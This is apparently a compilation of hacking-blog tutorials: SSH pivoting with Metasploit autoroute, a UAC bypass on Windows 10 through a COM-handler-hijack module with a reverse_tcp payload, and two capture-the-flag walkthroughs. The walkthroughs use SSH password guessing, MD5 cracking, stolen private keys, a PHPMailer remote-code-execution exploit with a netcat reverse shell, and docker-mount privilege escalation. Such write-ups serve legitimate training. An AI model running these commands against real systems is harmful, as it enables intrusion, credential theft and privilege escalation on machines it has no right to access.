SSH Pivoting using Meterpreter

If you are aware of SSH tunneling then you can easily understand SSH pivoting, if not then don’t worry read SSH tunneling from here.   

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack




This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109
msf auxiliary(ssh_login) > set username raj
msf auxiliary(ssh_login) > set password 123
msf auxiliary(ssh_login) > exploit


From given image you we can observe that command shell session 1 opened


Now convert command shell into meterpreter shell through following command
Session –u 1
From given image you can observe that Meterpreter session 2 opened

Sessions

Hence if you will count then currently attacker has hold 2 sessions, 1st for command shell and 2nd for meterpreter shell of SSH server.


Check network interface using ifconfig command
From given image you can observe two network interface in victim’s system 1st for IP 192.168.0.109 through which attacker is connected and 2nd for IP 192.168.10.1 through which SSH client (targets) is connected.

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.10.0 network attacker need run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 
msf post(autoroute) > set subnet 192.168.10.0
msf post(autoroute) > set session 2
msf post(autoroute) > exploit


This time we are exploiting SSH ignite (local client) therefore we are going to use same module for it that had used above for SSH raj, only need to change information inside exploit.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.10.2
msf auxiliary(ssh_login) > set username ignite
msf auxiliary(ssh_login) > set password 1234
msf auxiliary(ssh_login) > exploit

From given image you can see another command shell 3opened, if you will count then total attack has hold 3 sessions, two for SSH server and one for SSH client.

Sessions

1.       Command shell for SSH raj (192.168.0.109:22)
2.       Meterpreter shell for SSH raj (192.168.0.109)
3.       Command shell for SSH ignite (192.168.10.2:22)


Sessions 3
Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.
Ifconfig
From given you can observe the network IP is 192.168.10.2

Pivoting is Dangerous but enjoyable network attack J

Hack the Moria: 1.1 (CTF Challenge)

Today I found a Vulnerable Lab based on the world of Lords of The Rings. So get on your Gandalf mode to solve this fun Vulnerable Lab Moria 1.2., we are going to download the VM Machine from here.

The credit for developing this VM machine is goes to Abatchy. It is a Boot2Root Lab.
Note: According to author you don’t need LOTR knowledge to hack this VM, but trust me, you need it.
Let’s Breach!!!
As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.125 but you will have to find your own)

netdiscover

Use nmap command for port enumeration
nmap -sV 192.168.1.125

As you can see port 21 for ftp, port 22 for ssh and port 80 for http are open, so let’s explore port 80 through Browser.

 After Browsing I found this Image with label Gates of Moria. I decided to do a bit research on the text written in given below the image. After searching through some wiki pages, I found its translation “Say Friend and Enter” where Mellon means Friend.
So Friend or Mellon must be a password. Keeping that in mind let’s move forward. Here I decided to scan the target directory using dirb scan. Now open the terminal in Kali Linux and type the following command:
dirb http://192.168.1.125/
From scanning result I choose the highlighted directory for further enumeration.
http://192.168.1.125/w/


So I opened this directory in the Browser and found another directory inside it i.e h/


On opening it I got another directory and so on until it completes path /w/h/i/s/p/e/r. Here we find the last directory named the_abyss/ .
On opening the_abyss, I got some text as shown in image. Fundin:”That human will never save us!”
Tried to look at source code but nothing then again try to refresh the page and then found this above given text get changed into another the text, again refresh the page again text change into “Knock Knock”.
Firstly seemed weird but then I refreshed again and it changed again hence text were changing randomly when I refresh the web page.
So I decided to do a dirb scan but it gave no result, so I did an extension dirb scan as shown.
dirb http://192.168.1.125/w/h/i/s/p/e/r/the_abyss/ -X .txt .img .html

This dirb scanner scans for a particular extenstion which is specified like .txt or .img etc.

Aha! Found a file named random.txt.
So I opened it through the browser and found all the text that was coming on refreshing page in a single webpage as shown.
This text contains a lot of names like Balin, Oin, Ori, Fundin, Nain, Eru, Balrog, I noted them because they might be usernames or passwords.
Now I tried to connect with ftp port.

ftp 192.168.1.125

It greeted with Welcome Balrog
And I knew it must be the username because it was in the random.txt too but for password, I had tried multiple names which I found previously and then I remembered the text form the image, “Say friend and enter”. I entered Friend but login failed then tried with Mellow and got login successfully.
Therefore for FTP Login give following credential:
Username: Balrog
Password: Mellow
NOTE: - If you get an error, restart VM and also try multiple times with the above username and password.
After login, I tried pwd command and got the path to be /prision. I looked around it in hope of a flag but didn’t found any hint for flag. Then I found var folder and move inside inside.
Then I got to /var/www/html here I found this folder QlVraKW4fbIkXau9zkAPNGzviT3UKntl


When opened it in browser I found a table having two columns for Prisoner’s name and Passkey as shown in given image.

As always, I searched the source code for some hint. From View Source page I found the “salt” which can be used to decrypt the MD5 Password.

After trying different kinds of formats to decrypt above MD5 password I created a file with name and passkey and salt in this format 
Prisoner’s Name:Passkey$Salt
Name it whatever you want (Here I named it passwords and saved it on my kali Desktop).
Now we will run John The Ripper, Dynamic -6 on this file to decrypt it. By using this command in my kali terminal
john–form=dynamic_6 /root/Desktop/lol
These look like login credentials.

After trying all user credentials decrypted to login in ssh, I got success with
SSH Login
Username :Ori
Password :spanky
Now login into ssh using above credential


Here we got the bash shell. Now I tried multiple commands in search of a flag in ls-al, I found a poem.txt file, which contains a poem. But it didn’t find any flag inside it.
Then I looked into.ssh/ directory And found know_hosts file, and id_rsa file which contained the private key and then open these file one by one,
Cat id_rsa
Copy the entire text found inside id_rsa in a text file and save as id_rsa.
Now open another file known_host with cat command, here you will find host is “127.0.0.1”, let use these information for ssh login for root user.

Ssh -i id_rsa root@127.0.0.1
I got the ROOT.
But let’s finish it properly.  So I tried ls -la scan to get a flag. And I found a flag.txt inside flag.txt I got the Final Message “All that is gold does not glitter”.
It was an adventurous and learning experience and I would like to thank Abatchy for creating such a fun VM Lab




Bypass UAC in Windows 10 using bypass_comhijack Exploit

In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.

Let’s start!!

Attacker: Kali Linux
Target: window 10

Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getuid
getprivs

From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.


To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.


Copy the entire content of “bypass_comhijack” from here and past it in a text document, now save as bypass_comhijack.rb inside the following path:

usr>share>metasploit_framework>modules>exploit>windows>local

From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.


This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.

Use exploit/windows/local/bypassuac_comhijack
Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp
Msf exploit (bypassuac_comhijack) > set session 2
Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20
Msf exploit (bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.

getsystem
getprivs

Wonderful!! Attacker got system/admin authorities and privileges.

Hack the Donkey Docker (CTF Challenge)

Today we are going to solve a fun Vulnerable Lab DonkeyDocker, download this VM Machine from here.
The credit for developing this VM machine is goes to Dennis Herrmann who has hide 3 flag inside this lab as a challenge for hackers.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.120 but you will have to find your own)

Netdiscover


Use nmap command for port enumeration
nmap -sV 192.168.1.120
As you can see port 22 for ssh and 80 for http are open, so let’s explore port 80 through Browser.

After browsing I found three tabs Home, About and Contact but didn’t found any clue for next step, then I decided to scan the target directory using dirb scan.


Now open the terminal in kali Linux and type following command:
From scanning result I choose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.

Here, we get to know that PHPMailer is running on targeted system. Let try to find out its version.
 So After browsing a bit about PHP Mailer, we came know that how to get the version of phpmailer
http://192.168.1.120/mailer/VERSION
We got the version of PHPMailer i.e. 5.2.16.
From Google we came to known that PHPMailer 5.2.16 is vulnerable to Remote Code Execution (python) {CVE-2016-10033}. Exploiting PHPMail with back connection (reverse shell) from the target. You can download this exploit from here.


 After Downloading the Python File and make following changes:
1.      Open the file and add “# coding: utf-8” at the beginning.
2.      Set target = ‘http://192.168.1.20/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.
3.      Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code
4.      After making above changes save it.After Downloading the Python File and make following changes:
1.      Open the file and add “# coding: utf-8” at the beginning.
2.      Set target = ‘http://192.168.1.20/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.
3.      Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code
4.      After making above changes save it.
Now start natcat at port same port on which the payload is bind i.e. 4444 for establishing reverse connection with target.
nc –lvp 4444
Before you run the python script, type following command in a new terminal which will install the exploit dependency.
Pip2 install requests_toolbelt
Now run the script in order to exploit the target as shown in given image.
python 40974.py
Move back natcat shell and here you will find that it is connected to victim but not able to access proper shell of victim system therefore type given command in order to access victim shell properly as shown in image.
python -c 'import pty; pty.spawn("/bin/bash")'

Once you got the victim shell type following commands for finding hidden flag.
Ls
Cat main.sh
Here we found user smith which is a directory has flag.txt let approach toward this directory.
Cd home
Ls
While again opening smith directory, we got Permission denied.
Then we used su smith to instead of sudo, because sudo is not accessible in this shell
Su smith
For Password we tried “smith” and successfully get smith’s shell

Now we are inside smith shell, type following command to get the flag
Ls
Cd /home/smith
Ls
Flag.txt
Cat flag.xt

Grate!! Successfully capture 1st flag
Moreover if you notice the given image you will find next clue “I like 1984 written by Geoge ORWELL” it could be possible that it might be a user name having 2nd flag inside it.

Type following command to view all directory list
Ls-al
We got the authorized keys, id_ed25519 and id_ed25519.pub in SSH directory, lets open these key one by one
Cat authorized_keys
Cat id_ed25519
Cat id_ed25519.pub
In id_ed25519 we get the Openssh Private Key and this key is authorized for orwell@donkeydocker. Now copy the private key and past inside the text file.

We have Save this Private Key in a file as id_rsa as shown in given below image.
Now using ssh login by
Ssh –I id_rsaorwell@192.168.1.120
Here you will be greeted by the Donkey Docker Shell. Now check directory list for 2nd flag
Ls
Flag.txt
Cat flag.xt

Nice!! Successfully got 2nd shell

Now for the last flag we tried and a lot of different tricks but nothing seems to get through and you can read an article from here, which help in finding the 3rd flag.
Type following command
docker run –v /root:/hack –t debian:jessie /bin/sh -c ‘ls -al /hack’
This created a user named Jessie and gave it root access through privilege escalation; check all directory lists inside it, here we get the flag.txt file.

Now to open this file we will use the previous command just with slight modification as shown:
docker run -v /root:/hack -t debian:jessie /bin/sh -c ‘cat /hack/flag.txt’  
Awesome we got 3rd flag also.